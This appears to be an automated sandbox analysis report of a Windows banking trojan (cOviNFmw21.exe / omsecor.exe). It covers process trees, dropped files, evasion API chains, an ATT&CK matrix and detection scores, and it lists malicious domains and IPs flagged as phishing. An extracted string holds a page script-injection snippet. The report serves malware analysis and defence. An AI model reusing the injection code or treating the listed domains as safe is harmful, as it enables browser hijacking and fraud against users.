          Source: cOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
          Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/lousta.net
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/ta

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: cOviNFmw21.exe PID: 5344, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 3808, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 1732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 6904, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeFile created: C:\Windows\SysWOW64\merocz.xc6Jump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040D2A41_2_0040D2A4
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040B51C1_2_0040B51C
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040CBD01_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040D2A411_2_0040D2A4
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040B51C11_2_0040B51C
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040CBD011_2_0040CBD0
          Source: cOviNFmw21.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/3@3/3
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,1_2_0040A057
          Source: C:\Users\user\Desktop\cOviNFmw21.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: cOviNFmw21.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cOviNFmw21.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: cOviNFmw21.exeReversingLabs: Detection: 97%
          Source: C:\Users\user\Desktop\cOviNFmw21.exeFile read: C:\Users\user\Desktop\cOviNFmw21.exeJump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_1-3557
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_11-3558
          Source: unknownProcess created: C:\Users\user\Desktop\cOviNFmw21.exe "C:\Users\user\Desktop\cOviNFmw21.exe"
          Source: C:\Users\user\Desktop\cOviNFmw21.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\cOviNFmw21.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomoveJump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040D293 push ecx; ret 1_2_0040D2A3
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040CBB5 push ecx; ret 1_2_0040CBC8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040D293 push ecx; ret 11_2_0040D2A3
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040CBB5 push ecx; ret 11_2_0040CBC8

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\cOviNFmw21.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_1-3591
          Source: C:\Users\user\Desktop\cOviNFmw21.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-3591
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_11-3591
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_11-3591
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_11-3525
          Source: C:\Users\user\Desktop\cOviNFmw21.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-3544
          Source: C:\Users\user\Desktop\cOviNFmw21.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-3654
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_11-3670
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 3888Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 3268Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040ABD9 FindFirstFileW,FindClose,1_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040ABD9 FindFirstFileW,FindClose,11_2_0040ABD9
          Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpDR%SystemRoot%\system32\mswsock.dll
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.000000000065B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWta
          Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
          Source: C:\Users\user\Desktop\cOviNFmw21.exeAPI call chain: ExitProcess graph end nodegraph_1-3675
          Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_11-3675
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040D00B
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,1_2_004075D4
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040D00B
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 11_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040D00B
          Source: cOviNFmw21.exe, omsecor.exeBinary or memory string: Shell_TrayWnd
          Source: cOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.drBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_0040CB03 cpuid 1_2_0040CB03
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,1_2_00407267
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_00407499
          Source: C:\Users\user\Desktop\cOviNFmw21.exeCode function: 1_2_00406CB5 GetVersionExW,1_2_00406CB5
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          2
          Process Injection
          121
          Masquerading
          OS Credential Dumping2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts11
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Virtualization/Sandbox Evasion
          LSASS Memory121
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Process Injection
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          cOviNFmw21.exe97%ReversingLabsWin32.Trojan.ButeRat
          cOviNFmw21.exe100%AviraHEUR/AGEN.1317135
          cOviNFmw21.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\omsecor.exe100%AviraHEUR/AGEN.1317135
          C:\Windows\SysWOW64\omsecor.exe100%AviraHEUR/AGEN.1317135
          C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
          C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\omsecor.exe96%ReversingLabsWin32.Trojan.ButeRat
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://lousta.net/54/325.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/402/288.htmle100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM100%Avira URL Cloudphishing
          http://lousta.net/115/685.html53100%Avira URL Cloudphishing
          http://lousta.net/352/26.html100%Avira URL Cloudphishing
          http://lousta.net/352/26.htmls0100%Avira URL Cloudphishing
          http://lousta.net/158/950.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/697/241.html100%Avira URL Cloudphishing
          http://lousta.net/616/595.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/697/241.htmll100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/910/77.htmlCj100%Avira URL Cloudphishing
          http://lousta.net/352/26.html3418276100%Avira URL Cloudphishing
          http://ow5dirasuek.com/372/940.htmlj100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/697/241.htmlasuek.com100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/697/241.html/100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/i100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.htmlWI/100%Avira URL Cloudphishing
          http://lousta.net/115/685.html100%Avira URL Cloudphishing
          http://lousta.net/352/26.htmlz0o100%Avira URL Cloudphishing
          http://lousta.net/100%Avira URL Cloudphishing
          http://ow5dirasuek.com/618/507.html;100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.htmluj100%Avira URL Cloudphishing
          http://ow5dirasuek.com/618/507.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/lousta.net100%Avira URL Cloudphishing
          http://lousta.net/54/325.htmlwshqos.dll.mui100%Avira URL Cloudphishing
          http://ow5dirasuek.com/618/507.html%100%Avira URL Cloudphishing
          http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon100%Avira URL Cloudphishing
          http://lousta.net/j100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/910/77.htmlIIM100%Avira URL Cloudphishing
          http://ow5dirasuek.com/372/940.html100%Avira URL Cloudphishing
          http://lousta.net/594/342.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/ta100%Avira URL Cloudphishing
          http://ow5dirasuek.com/en-US100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/910/77.html0#=100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/910/77.html$#100%Avira URL Cloudphishing
          http://ow5dirasuek.com/100%Avira URL Cloudphishing
          http://lousta.net/562/345.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.htmlEIY100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.html-F100%Avira URL Cloudphishing
          http://ow5dirasuek.com/56/763.html%100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/910/77.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/697/241.html~x100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/402/288.html100%Avira URL Cloudphishing
          http://lousta.net/352/26.htmle1N100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          lousta.net
          193.166.255.171
          truetrue
            unknown
            mkkuei4kdsz.com
            15.197.204.56
            truetrue
              unknown
              ow5dirasuek.com
              52.34.198.229
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://lousta.net/54/325.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/true
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/158/950.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/352/26.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/697/241.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/616/595.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/115/685.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/true
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/618/507.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/372/940.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/true
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/562/345.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/910/77.htmltrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/402/288.htmltrue
                • Avira URL Cloud: phishing
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://lousta.net/352/26.htmls0omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/402/288.htmleomsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/115/685.html53omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEMomsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/697/241.htmllomsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/372/940.htmljomsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/910/77.htmlCjomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/352/26.html3418276omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/697/241.htmlasuek.comomsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/697/241.html/omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/iomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.htmlWI/omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/352/26.htmlz0oomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.htmlujomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/618/507.html;omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/54/325.htmlwshqos.dll.muiomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/lousta.netomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconcOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.drtrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/618/507.html%omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/jomsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/910/77.htmlIIMomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/en-USomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/taomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/594/342.htmlomsecor.exe, 0000000F.00000002.2500201090.0000000000640000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FA000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/910/77.html$#omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/910/77.html0#=omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.htmlEIYomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.html-Fomsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/56/763.html%omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/697/241.html~xomsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
